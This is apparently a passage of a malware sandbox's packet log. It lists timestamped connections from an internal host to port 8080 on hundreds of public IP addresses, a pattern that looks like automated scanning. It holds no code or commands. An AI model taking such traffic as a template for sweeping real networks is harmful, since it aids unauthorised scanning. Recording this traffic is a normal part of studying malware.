                                              Nov 23, 2023 05:14:48.020978928 CET478168080192.168.2.1431.231.108.12
                                              Nov 23, 2023 05:14:48.020981073 CET478168080192.168.2.1495.177.101.125
                                              Nov 23, 2023 05:14:48.020981073 CET478168080192.168.2.1485.121.161.225
                                              Nov 23, 2023 05:14:48.020982027 CET478168080192.168.2.1495.246.28.87
                                              Nov 23, 2023 05:14:48.020981073 CET478168080192.168.2.1485.3.201.216
                                              Nov 23, 2023 05:14:48.020981073 CET478168080192.168.2.1431.164.101.157
                                              Nov 23, 2023 05:14:48.020982981 CET478168080192.168.2.1495.63.174.0
                                              Nov 23, 2023 05:14:48.020981073 CET478168080192.168.2.1431.142.124.79
                                              Nov 23, 2023 05:14:48.020982981 CET478168080192.168.2.1462.205.76.138
                                              Nov 23, 2023 05:14:48.020984888 CET478168080192.168.2.1485.31.111.127
                                              Nov 23, 2023 05:14:48.020981073 CET478168080192.168.2.1462.186.54.21
                                              Nov 23, 2023 05:14:48.020986080 CET478168080192.168.2.1495.171.117.0
                                              Nov 23, 2023 05:14:48.020986080 CET478168080192.168.2.1485.164.140.109
                                              Nov 23, 2023 05:14:48.020981073 CET478168080192.168.2.1431.232.6.101
                                              Nov 23, 2023 05:14:48.020981073 CET478168080192.168.2.1495.146.207.169
                                              Nov 23, 2023 05:14:48.020994902 CET478168080192.168.2.1495.11.59.118
                                              Nov 23, 2023 05:14:48.021012068 CET478168080192.168.2.1495.160.118.66
                                              Nov 23, 2023 05:14:48.021012068 CET478168080192.168.2.1494.56.242.204
                                              Nov 23, 2023 05:14:48.021012068 CET478168080192.168.2.1495.137.151.30
                                              Nov 23, 2023 05:14:48.021013975 CET478168080192.168.2.1431.235.80.14
                                              Nov 23, 2023 05:14:48.021014929 CET478168080192.168.2.1495.62.26.178
                                              Nov 23, 2023 05:14:48.021014929 CET478168080192.168.2.1494.99.150.117
                                              Nov 23, 2023 05:14:48.021014929 CET478168080192.168.2.1495.216.251.73
                                              Nov 23, 2023 05:14:48.021015882 CET478168080192.168.2.1462.44.184.83
                                              Nov 23, 2023 05:14:48.021014929 CET478168080192.168.2.1462.36.146.155
                                              Nov 23, 2023 05:14:48.021015882 CET478168080192.168.2.1495.13.8.25
                                              Nov 23, 2023 05:14:48.021019936 CET478168080192.168.2.1495.161.31.34
                                              Nov 23, 2023 05:14:48.021019936 CET478168080192.168.2.1495.200.140.106
                                              Nov 23, 2023 05:14:48.021019936 CET478168080192.168.2.1494.131.213.140
                                              Nov 23, 2023 05:14:48.021019936 CET478168080192.168.2.1495.155.184.57
                                              Nov 23, 2023 05:14:48.021019936 CET478168080192.168.2.1431.59.109.13
                                              Nov 23, 2023 05:14:48.021034956 CET478168080192.168.2.1494.37.162.85
                                              Nov 23, 2023 05:14:48.021034956 CET478168080192.168.2.1485.58.19.164
                                              Nov 23, 2023 05:14:48.021034956 CET478168080192.168.2.1485.26.194.154
                                              Nov 23, 2023 05:14:48.021039009 CET478168080192.168.2.1462.203.83.193
                                              Nov 23, 2023 05:14:48.021040916 CET478168080192.168.2.1485.178.4.10
                                              Nov 23, 2023 05:14:48.021038055 CET478168080192.168.2.1462.245.42.248
                                              Nov 23, 2023 05:14:48.021040916 CET478168080192.168.2.1431.111.59.244
                                              Nov 23, 2023 05:14:48.021038055 CET478168080192.168.2.1485.191.68.32
                                              Nov 23, 2023 05:14:48.021039009 CET478168080192.168.2.1485.218.235.37
                                              Nov 23, 2023 05:14:48.021038055 CET478168080192.168.2.1495.253.107.121
                                              Nov 23, 2023 05:14:48.021045923 CET478168080192.168.2.1494.76.132.49
                                              Nov 23, 2023 05:14:48.021040916 CET478168080192.168.2.1495.71.251.35
                                              Nov 23, 2023 05:14:48.021039009 CET478168080192.168.2.1462.105.166.188
                                              Nov 23, 2023 05:14:48.021044016 CET478168080192.168.2.1431.89.136.49
                                              Nov 23, 2023 05:14:48.021050930 CET478168080192.168.2.1431.165.52.168
                                              Nov 23, 2023 05:14:48.021051884 CET478168080192.168.2.1495.176.232.211
                                              Nov 23, 2023 05:14:48.021050930 CET478168080192.168.2.1494.104.142.131
                                              Nov 23, 2023 05:14:48.021039009 CET478168080192.168.2.1495.68.141.113
                                              Nov 23, 2023 05:14:48.021040916 CET478168080192.168.2.1431.92.232.7
                                              Nov 23, 2023 05:14:48.021050930 CET478168080192.168.2.1462.174.140.49
                                              Nov 23, 2023 05:14:48.021044016 CET478168080192.168.2.1431.162.61.129
                                              Nov 23, 2023 05:14:48.021050930 CET478168080192.168.2.1431.22.160.87
                                              Nov 23, 2023 05:14:48.021056890 CET478168080192.168.2.1462.9.242.63
                                              Nov 23, 2023 05:14:48.021044016 CET478168080192.168.2.1495.33.45.75
                                              Nov 23, 2023 05:14:48.021056890 CET478168080192.168.2.1431.23.193.229
                                              Nov 23, 2023 05:14:48.021059990 CET478168080192.168.2.1485.7.173.136
                                              Nov 23, 2023 05:14:48.021040916 CET478168080192.168.2.1485.172.243.35
                                              Nov 23, 2023 05:14:48.021039009 CET478168080192.168.2.1485.206.38.183
                                              Nov 23, 2023 05:14:48.021040916 CET478168080192.168.2.1494.212.166.37
                                              Nov 23, 2023 05:14:48.021040916 CET478168080192.168.2.1494.97.55.37
                                              Nov 23, 2023 05:14:48.021065950 CET478168080192.168.2.1495.214.96.240
                                              Nov 23, 2023 05:14:48.021065950 CET478168080192.168.2.1494.226.145.217
                                              Nov 23, 2023 05:14:48.021065950 CET478168080192.168.2.1462.143.30.140
                                              Nov 23, 2023 05:14:48.021065950 CET478168080192.168.2.1485.59.116.32
                                              Nov 23, 2023 05:14:48.021078110 CET478168080192.168.2.1485.144.88.26
                                              Nov 23, 2023 05:14:48.021078110 CET478168080192.168.2.1431.179.124.48
                                              Nov 23, 2023 05:14:48.021084070 CET478168080192.168.2.1494.62.119.19
                                              Nov 23, 2023 05:14:48.021109104 CET478168080192.168.2.1494.85.114.241
                                              Nov 23, 2023 05:14:48.021112919 CET478168080192.168.2.1485.60.37.59
                                              Nov 23, 2023 05:14:48.021120071 CET478168080192.168.2.1485.214.209.109
                                              Nov 23, 2023 05:14:48.021120071 CET478168080192.168.2.1495.91.12.139
                                              Nov 23, 2023 05:14:48.021126986 CET478168080192.168.2.1495.29.1.83
                                              Nov 23, 2023 05:14:48.021126986 CET478168080192.168.2.1431.127.67.72
                                              Nov 23, 2023 05:14:48.021126986 CET478168080192.168.2.1495.230.187.31
                                              Nov 23, 2023 05:14:48.021126986 CET478168080192.168.2.1485.87.189.13
                                              Nov 23, 2023 05:14:48.021126986 CET478168080192.168.2.1494.69.60.99
                                              Nov 23, 2023 05:14:48.021131992 CET478168080192.168.2.1494.253.229.225
                                              Nov 23, 2023 05:14:48.021133900 CET478168080192.168.2.1431.138.226.205
                                              Nov 23, 2023 05:14:48.021147966 CET478168080192.168.2.1485.114.60.82
                                              Nov 23, 2023 05:14:48.021147966 CET478168080192.168.2.1431.16.56.127
                                              Nov 23, 2023 05:14:48.021147966 CET478168080192.168.2.1485.192.115.35
                                              Nov 23, 2023 05:14:48.021148920 CET478168080192.168.2.1485.44.53.213
                                              Nov 23, 2023 05:14:48.021148920 CET478168080192.168.2.1494.228.29.163
                                              Nov 23, 2023 05:14:48.021176100 CET478168080192.168.2.1495.181.58.231
                                              Nov 23, 2023 05:14:48.021193981 CET478168080192.168.2.1462.79.185.77
                                              Nov 23, 2023 05:14:48.021197081 CET478168080192.168.2.1485.18.242.253
                                              Nov 23, 2023 05:14:48.021200895 CET478168080192.168.2.1495.136.79.24
                                              Nov 23, 2023 05:14:48.021200895 CET478168080192.168.2.1431.141.71.20
                                              Nov 23, 2023 05:14:48.021200895 CET478168080192.168.2.1431.201.11.24
                                              Nov 23, 2023 05:14:48.021203995 CET478168080192.168.2.1495.225.101.200
                                              Nov 23, 2023 05:14:48.021203995 CET478168080192.168.2.1431.20.154.168
                                              Nov 23, 2023 05:14:48.021208048 CET478168080192.168.2.1485.86.145.184
                                              Nov 23, 2023 05:14:48.021208048 CET478168080192.168.2.1485.35.61.27
                                              Nov 23, 2023 05:14:48.021208048 CET478168080192.168.2.1462.219.214.226
                                              Nov 23, 2023 05:14:48.021209002 CET478168080192.168.2.1494.198.45.106
                                              Nov 23, 2023 05:14:48.021208048 CET478168080192.168.2.1494.139.122.124
                                              Nov 23, 2023 05:14:48.021254063 CET478168080192.168.2.1431.51.2.106
                                              Nov 23, 2023 05:14:48.021265984 CET478168080192.168.2.1431.158.9.142
                                              Nov 23, 2023 05:14:48.021274090 CET478168080192.168.2.1485.99.101.198
                                              Nov 23, 2023 05:14:48.021274090 CET478168080192.168.2.1485.171.136.48
                                              Nov 23, 2023 05:14:48.021274090 CET478168080192.168.2.1494.84.96.67
                                              Nov 23, 2023 05:14:48.021275043 CET478168080192.168.2.1431.45.118.110
                                              Nov 23, 2023 05:14:48.021275043 CET478168080192.168.2.1485.163.187.12
                                              Nov 23, 2023 05:14:48.021274090 CET478168080192.168.2.1485.135.74.229
                                              Nov 23, 2023 05:14:48.021275997 CET478168080192.168.2.1462.72.219.244
                                              Nov 23, 2023 05:14:48.021274090 CET478168080192.168.2.1495.82.85.151
                                              Nov 23, 2023 05:14:48.021275997 CET478168080192.168.2.1494.150.54.231
                                              Nov 23, 2023 05:14:48.021275043 CET478168080192.168.2.1494.145.213.138
                                              Nov 23, 2023 05:14:48.021275997 CET478168080192.168.2.1431.232.192.202
                                              Nov 23, 2023 05:14:48.021282911 CET478168080192.168.2.1462.25.57.56
                                              Nov 23, 2023 05:14:48.021282911 CET478168080192.168.2.1485.164.140.108
                                              Nov 23, 2023 05:14:48.021306992 CET478168080192.168.2.1431.73.15.113
                                              Nov 23, 2023 05:14:48.021306992 CET478168080192.168.2.1462.225.179.69
                                              Nov 23, 2023 05:14:48.021307945 CET478168080192.168.2.1485.218.197.44
                                              Nov 23, 2023 05:14:48.021306992 CET478168080192.168.2.1485.199.117.177
                                              Nov 23, 2023 05:14:48.021307945 CET478168080192.168.2.1494.207.137.153
                                              Nov 23, 2023 05:14:48.021311045 CET478168080192.168.2.1462.29.65.154
                                              Nov 23, 2023 05:14:48.021307945 CET478168080192.168.2.1462.30.78.62
                                              Nov 23, 2023 05:14:48.021306992 CET478168080192.168.2.1494.201.153.149
                                              Nov 23, 2023 05:14:48.021311045 CET478168080192.168.2.1495.109.57.3
                                              Nov 23, 2023 05:14:48.021320105 CET478168080192.168.2.1495.243.55.140
                                              Nov 23, 2023 05:14:48.021307945 CET478168080192.168.2.1485.202.151.13
                                              Nov 23, 2023 05:14:48.021320105 CET478168080192.168.2.1494.92.31.209
                                              Nov 23, 2023 05:14:48.021306992 CET478168080192.168.2.1431.254.197.81
                                              Nov 23, 2023 05:14:48.021320105 CET478168080192.168.2.1431.21.81.222
                                              Nov 23, 2023 05:14:48.021322012 CET478168080192.168.2.1462.2.183.252
                                              Nov 23, 2023 05:14:48.021320105 CET478168080192.168.2.1431.133.146.166
                                              Nov 23, 2023 05:14:48.021322012 CET478168080192.168.2.1494.87.158.34
                                              Nov 23, 2023 05:14:48.021320105 CET478168080192.168.2.1494.5.116.3
                                              Nov 23, 2023 05:14:48.021320105 CET478168080192.168.2.1485.94.172.238
                                              Nov 23, 2023 05:14:48.021327019 CET478168080192.168.2.1462.149.129.139
                                              Nov 23, 2023 05:14:48.021327019 CET478168080192.168.2.1462.177.158.125
                                              Nov 23, 2023 05:14:48.021327019 CET478168080192.168.2.1494.237.228.147
                                              Nov 23, 2023 05:14:48.021327972 CET478168080192.168.2.1462.213.121.15
                                              Nov 23, 2023 05:14:48.021327019 CET478168080192.168.2.1431.124.201.75
                                              Nov 23, 2023 05:14:48.021327972 CET478168080192.168.2.1494.243.215.37
                                              Nov 23, 2023 05:14:48.021327019 CET478168080192.168.2.1431.42.146.136
                                              Nov 23, 2023 05:14:48.021327972 CET478168080192.168.2.1431.204.240.8
                                              Nov 23, 2023 05:14:48.021327019 CET478168080192.168.2.1462.134.12.204
                                              Nov 23, 2023 05:14:48.021327972 CET478168080192.168.2.1485.79.83.124
                                              Nov 23, 2023 05:14:48.021327019 CET478168080192.168.2.1495.44.73.229
                                              Nov 23, 2023 05:14:48.021327972 CET478168080192.168.2.1494.38.38.3
                                              Nov 23, 2023 05:14:48.021327019 CET478168080192.168.2.1462.206.6.63
                                              Nov 23, 2023 05:14:48.021327972 CET478168080192.168.2.1462.219.71.186
                                              Nov 23, 2023 05:14:48.021327019 CET478168080192.168.2.1495.83.194.185
                                              Nov 23, 2023 05:14:48.021331072 CET478168080192.168.2.1431.254.162.166
                                              Nov 23, 2023 05:14:48.021331072 CET478168080192.168.2.1462.177.124.101
                                              Nov 23, 2023 05:14:48.021337986 CET478168080192.168.2.1494.225.9.162
                                              Nov 23, 2023 05:14:48.021378994 CET478168080192.168.2.1431.33.171.141
                                              Nov 23, 2023 05:14:48.021378994 CET478168080192.168.2.1494.22.247.26
                                              Nov 23, 2023 05:14:48.021378994 CET478168080192.168.2.1494.57.26.72
                                              Nov 23, 2023 05:14:48.021378994 CET478168080192.168.2.1431.225.14.206
                                              Nov 23, 2023 05:14:48.021378994 CET478168080192.168.2.1485.124.222.244
                                              Nov 23, 2023 05:14:48.021378994 CET478168080192.168.2.1494.194.254.115
                                              Nov 23, 2023 05:14:48.021378994 CET478168080192.168.2.1485.104.179.231
                                              Nov 23, 2023 05:14:48.021380901 CET478168080192.168.2.1462.114.157.18
                                              Nov 23, 2023 05:14:48.021380901 CET478168080192.168.2.1494.110.239.34
                                              Nov 23, 2023 05:14:48.021380901 CET478168080192.168.2.1495.245.249.34
                                              Nov 23, 2023 05:14:48.021380901 CET478168080192.168.2.1485.154.56.24
                                              Nov 23, 2023 05:14:48.021380901 CET478168080192.168.2.1462.162.44.2
                                              Nov 23, 2023 05:14:48.021390915 CET478168080192.168.2.1485.240.253.226
                                              Nov 23, 2023 05:14:48.021390915 CET478168080192.168.2.1495.151.51.40
                                              Nov 23, 2023 05:14:48.021390915 CET478168080192.168.2.1495.152.135.23
                                              Nov 23, 2023 05:14:48.021390915 CET478168080192.168.2.1485.186.7.127
                                              Nov 23, 2023 05:14:48.021397114 CET478168080192.168.2.1462.44.96.248
                                              Nov 23, 2023 05:14:48.021397114 CET478168080192.168.2.1494.90.51.255
                                              Nov 23, 2023 05:14:48.021397114 CET478168080192.168.2.1485.144.145.46
                                              Nov 23, 2023 05:14:48.021397114 CET478168080192.168.2.1495.102.153.9
                                              Nov 23, 2023 05:14:48.021397114 CET478168080192.168.2.1495.221.91.14
                                              Nov 23, 2023 05:14:48.021397114 CET478168080192.168.2.1485.232.136.67
                                              Nov 23, 2023 05:14:48.021397114 CET478168080192.168.2.1494.85.147.151
                                              Nov 23, 2023 05:14:48.021397114 CET478168080192.168.2.1495.231.221.165
                                              Nov 23, 2023 05:14:48.021414042 CET478168080192.168.2.1431.76.5.2
                                              Nov 23, 2023 05:14:48.021414042 CET478168080192.168.2.1494.212.187.154
                                              Nov 23, 2023 05:14:48.021414042 CET478168080192.168.2.1495.160.33.203
                                              Nov 23, 2023 05:14:48.021414042 CET478168080192.168.2.1431.255.144.68
                                              Nov 23, 2023 05:14:48.021421909 CET478168080192.168.2.1462.183.162.19
                                              Nov 23, 2023 05:14:48.021421909 CET478168080192.168.2.1431.20.126.118
                                              Nov 23, 2023 05:14:48.021421909 CET478168080192.168.2.1431.222.61.215
                                              Nov 23, 2023 05:14:48.021421909 CET478168080192.168.2.1495.68.10.113
                                              Nov 23, 2023 05:14:48.021421909 CET478168080192.168.2.1494.87.132.145
                                              Nov 23, 2023 05:14:48.021421909 CET478168080192.168.2.1485.244.139.224
                                              Nov 23, 2023 05:14:48.021421909 CET478168080192.168.2.1462.175.166.244
                                              Nov 23, 2023 05:14:48.021421909 CET478168080192.168.2.1495.216.27.17
                                              Nov 23, 2023 05:14:48.021430016 CET478168080192.168.2.1462.250.208.59
                                              Nov 23, 2023 05:14:48.021430016 CET478168080192.168.2.1431.197.0.73
                                              Nov 23, 2023 05:14:48.021430016 CET478168080192.168.2.1495.224.101.12
                                              Nov 23, 2023 05:14:48.021430016 CET478168080192.168.2.1462.71.140.60
                                              Nov 23, 2023 05:14:48.021430016 CET478168080192.168.2.1462.30.21.76
                                              Nov 23, 2023 05:14:48.021430016 CET478168080192.168.2.1462.187.51.251
                                              Nov 23, 2023 05:14:48.021433115 CET478168080192.168.2.1431.247.27.241
                                              Nov 23, 2023 05:14:48.021433115 CET478168080192.168.2.1431.69.201.240
                                              Nov 23, 2023 05:14:48.021433115 CET478168080192.168.2.1495.196.79.137
                                              Nov 23, 2023 05:14:48.021433115 CET478168080192.168.2.1431.96.253.122
                                              Nov 23, 2023 05:14:48.021455050 CET478168080192.168.2.1494.209.115.247
                                              Nov 23, 2023 05:14:48.021455050 CET478168080192.168.2.1431.44.30.175
                                              Nov 23, 2023 05:14:48.021456003 CET478168080192.168.2.1495.36.111.253
                                              Nov 23, 2023 05:14:48.021456003 CET478168080192.168.2.1431.77.70.235
                                              Nov 23, 2023 05:14:48.021456003 CET478168080192.168.2.1485.63.43.40
                                              Nov 23, 2023 05:14:48.021485090 CET478168080192.168.2.1495.245.110.25
                                              Nov 23, 2023 05:14:48.021485090 CET478168080192.168.2.1431.121.165.188
                                              Nov 23, 2023 05:14:48.021485090 CET478168080192.168.2.1494.54.234.110
                                              Nov 23, 2023 05:14:48.021485090 CET478168080192.168.2.1462.34.18.1
                                              Nov 23, 2023 05:14:48.021485090 CET478168080192.168.2.1462.84.146.129
                                              Nov 23, 2023 05:14:48.021485090 CET478168080192.168.2.1462.32.250.95
                                              Nov 23, 2023 05:14:48.021498919 CET478168080192.168.2.1495.9.17.19
                                              Nov 23, 2023 05:14:48.021498919 CET478168080192.168.2.1495.95.136.234
                                              Nov 23, 2023 05:14:48.021498919 CET478168080192.168.2.1485.196.178.111
                                              Nov 23, 2023 05:14:48.021500111 CET478168080192.168.2.1462.252.252.120
                                              Nov 23, 2023 05:14:48.021498919 CET478168080192.168.2.1431.164.255.132
                                              Nov 23, 2023 05:14:48.021500111 CET478168080192.168.2.1485.129.75.24
                                              Nov 23, 2023 05:14:48.021505117 CET478168080192.168.2.1485.133.230.14
                                              Nov 23, 2023 05:14:48.021502972 CET478168080192.168.2.1485.164.159.218
                                              Nov 23, 2023 05:14:48.021505117 CET478168080192.168.2.1462.236.240.32
                                              Nov 23, 2023 05:14:48.021500111 CET478168080192.168.2.1431.76.83.89
                                              Nov 23, 2023 05:14:48.021502972 CET478168080192.168.2.1485.238.2.63
                                              Nov 23, 2023 05:14:48.021505117 CET478168080192.168.2.1485.174.64.68
                                              Nov 23, 2023 05:14:48.021505117 CET478168080192.168.2.1431.220.111.254
                                              Nov 23, 2023 05:14:48.021502972 CET478168080192.168.2.1431.186.216.214
                                              Nov 23, 2023 05:14:48.021505117 CET478168080192.168.2.1431.107.69.111
                                              Nov 23, 2023 05:14:48.021502972 CET478168080192.168.2.1485.80.27.252
                                              Nov 23, 2023 05:14:48.021505117 CET478168080192.168.2.1495.17.6.127
                                              Nov 23, 2023 05:14:48.021505117 CET478168080192.168.2.1462.211.20.200
                                              Nov 23, 2023 05:14:48.021502972 CET478168080192.168.2.1431.114.170.145
                                              Nov 23, 2023 05:14:48.021505117 CET478168080192.168.2.1431.5.131.79
                                              Nov 23, 2023 05:14:48.021503925 CET478168080192.168.2.1431.191.215.206
                                              Nov 23, 2023 05:14:48.021503925 CET478168080192.168.2.1494.201.223.178
                                              Nov 23, 2023 05:14:48.021503925 CET478168080192.168.2.1494.200.170.220
                                              Nov 23, 2023 05:14:48.021524906 CET478168080192.168.2.1462.40.40.118
                                              Nov 23, 2023 05:14:48.021524906 CET478168080192.168.2.1494.158.131.213
                                              Nov 23, 2023 05:14:48.021524906 CET478168080192.168.2.1494.11.132.201
                                              Nov 23, 2023 05:14:48.021524906 CET478168080192.168.2.1485.97.189.229
                                              Nov 23, 2023 05:14:48.021544933 CET478168080192.168.2.1485.11.13.205
                                              Nov 23, 2023 05:14:48.021544933 CET478168080192.168.2.1494.68.61.43
                                              Nov 23, 2023 05:14:48.021544933 CET478168080192.168.2.1495.254.183.183
                                              Nov 23, 2023 05:14:48.021544933 CET478168080192.168.2.1462.3.57.14
                                              Nov 23, 2023 05:14:48.021544933 CET478168080192.168.2.1495.117.202.74
                                              Nov 23, 2023 05:14:48.021544933 CET478168080192.168.2.1495.209.52.153
                                              Nov 23, 2023 05:14:48.021544933 CET478168080192.168.2.1494.217.235.220
                                              Nov 23, 2023 05:14:48.021572113 CET478168080192.168.2.1495.105.155.19
                                              Nov 23, 2023 05:14:48.021572113 CET478168080192.168.2.1431.159.21.83
                                              Nov 23, 2023 05:14:48.021595955 CET478168080192.168.2.1485.135.222.166
                                              Nov 23, 2023 05:14:48.021595955 CET478168080192.168.2.1495.229.180.224
                                              Nov 23, 2023 05:14:48.021595955 CET478168080192.168.2.1494.38.244.112
                                              Nov 23, 2023 05:14:48.021595955 CET478168080192.168.2.1431.105.124.2
                                              Nov 23, 2023 05:14:48.021595955 CET478168080192.168.2.1485.103.41.129
                                              Nov 23, 2023 05:14:48.021595955 CET478168080192.168.2.1462.23.140.160
                                              Nov 23, 2023 05:14:48.021595955 CET478168080192.168.2.1462.176.233.89
                                              Nov 23, 2023 05:14:48.021595955 CET478168080192.168.2.1462.25.82.201
                                              Nov 23, 2023 05:14:48.022463083 CET478168080192.168.2.1494.197.192.136
                                              Nov 23, 2023 05:14:48.022473097 CET478168080192.168.2.1431.243.115.64
                                              Nov 23, 2023 05:14:48.022473097 CET478168080192.168.2.1462.56.45.58
                                              Nov 23, 2023 05:14:48.022480965 CET478168080192.168.2.1485.144.210.143
                                              Nov 23, 2023 05:14:48.022517920 CET478168080192.168.2.1485.72.200.75
                                              Nov 23, 2023 05:14:48.022517920 CET478168080192.168.2.1485.207.82.88
                                              Nov 23, 2023 05:14:48.022517920 CET478168080192.168.2.1462.95.36.250
                                              Nov 23, 2023 05:14:48.022519112 CET478168080192.168.2.1462.110.181.151
                                              Nov 23, 2023 05:14:48.022520065 CET478168080192.168.2.1485.176.69.81
                                              Nov 23, 2023 05:14:48.022521019 CET478168080192.168.2.1462.32.70.168
                                              Nov 23, 2023 05:14:48.022521019 CET478168080192.168.2.1494.148.196.221
                                              Nov 23, 2023 05:14:48.022524118 CET478168080192.168.2.1495.176.117.47
                                              Nov 23, 2023 05:14:48.022524118 CET478168080192.168.2.1431.129.85.36
                                              Nov 23, 2023 05:14:48.022530079 CET478168080192.168.2.1431.144.3.167
                                              Nov 23, 2023 05:14:48.022530079 CET478168080192.168.2.1485.192.122.90
                                              Nov 23, 2023 05:14:48.022530079 CET478168080192.168.2.1494.185.4.46
                                              Nov 23, 2023 05:14:48.022532940 CET478168080192.168.2.1462.101.249.150
                                              Nov 23, 2023 05:14:48.022533894 CET478168080192.168.2.1495.200.47.104
                                              Nov 23, 2023 05:14:48.022533894 CET478168080192.168.2.1485.187.71.109
                                              Nov 23, 2023 05:14:48.022548914 CET478168080192.168.2.1485.198.194.118
                                              Nov 23, 2023 05:14:48.022548914 CET478168080192.168.2.1462.76.12.153
                                              Nov 23, 2023 05:14:48.022550106 CET478168080192.168.2.1485.208.128.147
                                              Nov 23, 2023 05:14:48.022548914 CET478168080192.168.2.1494.45.208.181
                                              Nov 23, 2023 05:14:48.022551060 CET478168080192.168.2.1495.5.66.11
                                              Nov 23, 2023 05:14:48.022550106 CET478168080192.168.2.1494.80.98.211
                                              Nov 23, 2023 05:14:48.022551060 CET478168080192.168.2.1495.88.187.120
                                              Nov 23, 2023 05:14:48.022548914 CET478168080192.168.2.1431.152.63.149
                                              Nov 23, 2023 05:14:48.022548914 CET478168080192.168.2.1495.19.220.110
                                              Nov 23, 2023 05:14:48.022548914 CET478168080192.168.2.1494.157.185.48
                                              Nov 23, 2023 05:14:48.022548914 CET478168080192.168.2.1495.36.67.119
                                              Nov 23, 2023 05:14:48.022566080 CET478168080192.168.2.1431.163.27.7
                                              Nov 23, 2023 05:14:48.022567034 CET478168080192.168.2.1494.139.7.79
                                              Nov 23, 2023 05:14:48.022569895 CET478168080192.168.2.1495.241.212.216
                                              Nov 23, 2023 05:14:48.022578955 CET478168080192.168.2.1431.170.117.152
                                              Nov 23, 2023 05:14:48.022578955 CET478168080192.168.2.1495.39.185.20
                                              Nov 23, 2023 05:14:48.022578955 CET478168080192.168.2.1462.13.15.104
                                              Nov 23, 2023 05:14:48.022582054 CET478168080192.168.2.1485.206.136.106
                                              Nov 23, 2023 05:14:48.022592068 CET478168080192.168.2.1495.14.0.66
                                              Nov 23, 2023 05:14:48.022613049 CET478168080192.168.2.1431.100.240.201
                                              Nov 23, 2023 05:14:48.022613049 CET478168080192.168.2.1495.122.24.235
                                              Nov 23, 2023 05:14:48.022619963 CET478168080192.168.2.1494.249.46.101
                                              Nov 23, 2023 05:14:48.022619963 CET478168080192.168.2.1485.78.76.16
                                              Nov 23, 2023 05:14:48.022619963 CET478168080192.168.2.1494.254.250.179
                                              Nov 23, 2023 05:14:48.022619963 CET478168080192.168.2.1431.171.137.222
                                              Nov 23, 2023 05:14:48.022619963 CET478168080192.168.2.1462.153.126.103
                                              Nov 23, 2023 05:14:48.022656918 CET478168080192.168.2.1485.131.74.132
                                              Nov 23, 2023 05:14:48.022675037 CET478168080192.168.2.1485.215.53.155
                                              Nov 23, 2023 05:14:48.022675037 CET478168080192.168.2.1495.50.174.68
                                              Nov 23, 2023 05:14:48.022676945 CET478168080192.168.2.1494.179.67.249
                                              Nov 23, 2023 05:14:48.022676945 CET478168080192.168.2.1462.24.30.76
                                              Nov 23, 2023 05:14:48.022676945 CET478168080192.168.2.1494.192.53.227
                                              Nov 23, 2023 05:14:48.022677898 CET478168080192.168.2.1494.81.85.80
                                              Nov 23, 2023 05:14:48.022679090 CET478168080192.168.2.1495.161.173.101
                                              Nov 23, 2023 05:14:48.022680998 CET478168080192.168.2.1494.217.229.109
                                              Nov 23, 2023 05:14:48.022680998 CET478168080192.168.2.1495.65.195.90
                                              Nov 23, 2023 05:14:48.022682905 CET478168080192.168.2.1431.35.25.108
                                              Nov 23, 2023 05:14:48.022682905 CET478168080192.168.2.1462.219.107.167
                                              Nov 23, 2023 05:14:48.022682905 CET478168080192.168.2.1494.17.140.200
                                              Nov 23, 2023 05:14:48.022684097 CET478168080192.168.2.1462.143.42.0
                                              Nov 23, 2023 05:14:48.022712946 CET478168080192.168.2.1495.59.17.49
                                              Nov 23, 2023 05:14:48.022712946 CET478168080192.168.2.1431.207.99.55
                                              Nov 23, 2023 05:14:48.022712946 CET478168080192.168.2.1462.178.220.65
                                              Nov 23, 2023 05:14:48.022712946 CET478168080192.168.2.1495.205.26.32
                                              Nov 23, 2023 05:14:48.022712946 CET478168080192.168.2.1495.197.253.203
                                              Nov 23, 2023 05:14:48.022712946 CET478168080192.168.2.1494.11.248.180
                                              Nov 23, 2023 05:14:48.022712946 CET478168080192.168.2.1494.31.218.119
                                              Nov 23, 2023 05:14:48.022715092 CET478168080192.168.2.1485.152.81.104
                                              Nov 23, 2023 05:14:48.022715092 CET478168080192.168.2.1495.240.70.79
                                              Nov 23, 2023 05:14:48.022715092 CET478168080192.168.2.1462.75.77.74
                                              Nov 23, 2023 05:14:48.022716045 CET478168080192.168.2.1431.166.113.244
                                              Nov 23, 2023 05:14:48.022716999 CET478168080192.168.2.1485.202.134.175
                                              Nov 23, 2023 05:14:48.022716045 CET478168080192.168.2.1495.209.126.31
                                              Nov 23, 2023 05:14:48.022716999 CET478168080192.168.2.1494.236.67.137
                                              Nov 23, 2023 05:14:48.022716999 CET478168080192.168.2.1431.178.192.158
                                              Nov 23, 2023 05:14:48.022716999 CET478168080192.168.2.1494.229.224.2
                                              Nov 23, 2023 05:14:48.022717953 CET478168080192.168.2.1485.116.46.255
                                              Nov 23, 2023 05:14:48.022717953 CET478168080192.168.2.1431.143.238.124
                                              Nov 23, 2023 05:14:48.022716999 CET478168080192.168.2.1431.44.188.156
                                              Nov 23, 2023 05:14:48.022716999 CET478168080192.168.2.1495.135.219.34
                                              Nov 23, 2023 05:14:48.022716999 CET478168080192.168.2.1495.205.12.24
                                              Nov 23, 2023 05:14:48.022717953 CET478168080192.168.2.1494.164.79.77
                                              Nov 23, 2023 05:14:48.022716045 CET478168080192.168.2.1495.20.231.200
                                              Nov 23, 2023 05:14:48.022716999 CET478168080192.168.2.1495.192.244.202
                                              Nov 23, 2023 05:14:48.022717953 CET478168080192.168.2.1485.220.10.254
                                              Nov 23, 2023 05:14:48.022716999 CET478168080192.168.2.1462.254.226.217
                                              Nov 23, 2023 05:14:48.022717953 CET478168080192.168.2.1462.53.156.82
                                              Nov 23, 2023 05:14:48.022716999 CET478168080192.168.2.1462.168.95.72
                                              Nov 23, 2023 05:14:48.022716999 CET478168080192.168.2.1494.231.198.186
                                              Nov 23, 2023 05:14:48.022716999 CET478168080192.168.2.1485.47.83.246
                                              Nov 23, 2023 05:14:48.022716999 CET478168080192.168.2.1494.159.191.113
                                              Nov 23, 2023 05:14:48.022716999 CET478168080192.168.2.1494.203.21.121
                                              Nov 23, 2023 05:14:48.022737980 CET478168080192.168.2.1494.155.126.49
                                              Nov 23, 2023 05:14:48.022737980 CET478168080192.168.2.1485.166.148.172
                                              Nov 23, 2023 05:14:48.022737980 CET478168080192.168.2.1431.146.103.128
                                              Nov 23, 2023 05:14:48.022737980 CET478168080192.168.2.1494.203.75.33
                                              Nov 23, 2023 05:14:48.022748947 CET478168080192.168.2.1494.250.145.108
                                              Nov 23, 2023 05:14:48.022748947 CET478168080192.168.2.1462.147.12.170
                                              Nov 23, 2023 05:14:48.022748947 CET478168080192.168.2.1431.102.188.111
